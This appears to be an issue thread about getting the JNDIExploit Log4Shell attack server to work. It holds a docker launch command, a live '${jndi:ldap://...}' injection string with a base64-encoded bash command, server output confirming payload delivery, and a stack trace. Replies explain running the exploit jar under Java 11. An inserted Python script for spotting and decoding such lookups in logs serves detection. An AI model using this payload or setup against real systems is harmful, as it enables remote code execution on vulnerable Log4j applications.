JNDIExploit-1
java.lang.NoClassDefFoundError
docker run -it -p 1389:1389 -e LDAP_PORT=1389 -p 80:80 -e HTTP_PORT=80 jndiexploit
${jndi:ldap://192.168.1.11:1389/Basic/Command/base64/YmFzaCAtaSB0b3VjaCAvdG1wL3R0dHQ=}
[+] Received LDAP Query: Basic/Command/base64/YmFzaCAtaSB0b3VjaCAvdG1wL3R0dHQ=
[+] Paylaod: command
[+] Command: bash -i touch /tmp/tttt
[+] Sending LDAP ResourceRef result for Basic/Command/base64/YmFzaCAtaSB0b3VjaCAvdG1wL3R0dHQ= with basic remote reference payload
Exception in thread "LDAPListener client connection reader for connection from 172.17.0.1:62830 to 172.17.0.3:1389" java.lang.NoClassDefFoundError: Could not initialize class com.feihong.ldap.utils.Cache
at com.feihong.ldap.template.CommandTemplate.cache(CommandTemplate.java:28)
at com.feihong.ldap.controllers.BasicController.sendResult(BasicController.java:37)
at com.feihong.ldap.LdapServer.processSearchResult(LdapServer.java:92)
at com.unboundid.ldap.listener.interceptor.InMemoryOperationInterceptorRequestHandler.processSearchRequest(InMemoryOperationInterceptorRequestHandler.java:831)
at com.unboundid.ldap.listener.StartTLSRequestHandler.processSearchRequest(StartTLSRequestHandler.java:309)
at com.unboundid.ldap.listener.LDAPListenerClientConnection.run(LDAPListenerClientConnection.java:582)
Caused by: java.lang.ExceptionInInitializerError: Exception java.lang.IllegalAccessError: superclass access check failed: class com.feihong.ldap.template.TomcatEchoTemplate (in unnamed module @0x6d6e41aa) cannot access class com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet (in module java.xml) because module java.xml does not export com.sun.org.apache.xalan.internal.xsltc.runtime to unnamed module @0x6d6e41aa [in thread "LDAPListener client connection reader for connection from 172.17.0.1:62694 to 172.17.0.3:1389"]
at java.base/java.lang.ClassLoader.defineClass1(Native Method)
at java.base/java.lang.ClassLoader.defineClass(ClassLoader.java:1013)
at java.base/java.security.SecureClassLoader.defineClass(SecureClassLoader.java:150)
at java.base/jdk.internal.loader.BuiltinClassLoader.defineClass(BuiltinClassLoader.java:862)
at java.base/jdk.internal.loader.BuiltinClassLoader.findClassOnClassPathOrNull(BuiltinClassLoader.java:760)
at java.base/jdk.internal.loader.BuiltinClassLoader.loadClassOrNull(BuiltinClassLoader.java:681)
at java.base/jdk.internal.loader.BuiltinClassLoader.loadClass(BuiltinClassLoader.java:639)
at java.base/jdk.internal.loader.ClassLoaders$AppClassLoader.loadClass(ClassLoaders.java:188)
at java.base/java.lang.ClassLoader.loadClass(ClassLoader.java:521)
at com.feihong.ldap.utils.Cache.<clinit>(Cache.java:19)
... 6 more
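For responders who find a lookup string of this form in application or proxy logs, the following is an added example (not part of the original report and not JNDIExploit code) that extracts plain `${jndi:...}` lookups from log lines and decodes a `base64` path segment like the one above. The function names and the sample log lines are constructed for illustration, and obfuscated lookup variants are out of scope.

```python
import base64
import re
from urllib.parse import unquote, urlsplit

# Plain (non-obfuscated) lookups only, in the form shown in the report above.
JNDI_RE = re.compile(r"\$\{jndi:((?:ldaps?|rmi|dns)://[^}\s]+)\}", re.IGNORECASE)

# Constructed sample lines; the first embeds the lookup string from the report.
SAMPLE_LOG = [
    '10.0.0.5 "GET / HTTP/1.1" 200 "${jndi:ldap://192.168.1.11:1389/Basic/Command/base64/YmFzaCAtaSB0b3VjaCAvdG1wL3R0dHQ=}"',
    '10.0.0.6 "GET /health HTTP/1.1" 200 "curl/8.0"',
    '10.0.0.7 "GET / HTTP/1.1" 200 "${jndi:ldap://192.0.2.10:1389/a}"',
]


def decode_b64_segment(segment):
    """Decode a base64 path segment; return None when it is not valid base64."""
    try:
        padded = segment + "=" * (-len(segment) % 4)
        return base64.b64decode(padded, validate=True).decode("utf-8", "replace")
    except ValueError:  # binascii.Error is a ValueError subclass
        return None


def triage_line(line):
    """Return one finding per JNDI lookup in a log line, with any base64 command decoded."""
    findings = []
    for match in JNDI_RE.finditer(line):
        parts = urlsplit(match.group(1))
        segments = unquote(parts.path).lstrip("/").split("/")
        lowered = [s.lower() for s in segments]
        decoded = None
        if "base64" in lowered:
            # Standard base64 may contain "/", so rejoin everything after the marker.
            rest = "/".join(segments[lowered.index("base64") + 1:])
            decoded = decode_b64_segment(rest)
        try:
            port = parts.port
        except ValueError:  # malformed port in the lookup URL
            port = None
        findings.append({"scheme": parts.scheme.lower(), "host": parts.hostname,
                         "port": port, "path": parts.path, "decoded": decoded})
    return findings


if __name__ == "__main__":
    for entry in SAMPLE_LOG:
        for finding in triage_line(entry):
            print(finding)
```

The decoded command and the callback host and port give the follow-up indicators to search for on the affected host and in egress logs.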
You should use an older JDK image, i.e. openjdk:11-jdk-slim-bullseye
I had a very similar problem. I fixed that using "java-11-openjdk-amd64". It seems like there is a problem with recent Java versions. I use "java-11-openjdk-amd64" and it works. I will describe the steps in case it helps someone:
- First you need to set an alias to use java. You can set aliases in your .zshrc as follows:
  alias java11='/usr/lib/jvm/java-11-openjdk-amd64/bin/java'
  alias java17='/usr/lib/jvm/java-17-openjdk-amd64/bin/java'
  In this case I set two aliases, one for java11 and one for java17
- Then you have to run the following command to update your aliases: source /home/kali/.zshrc
- After that you can use java11 as follows: java11 -jar JNDIExploit-1.2-SNAPSHOT.jar -i
-p 8888
Good luck.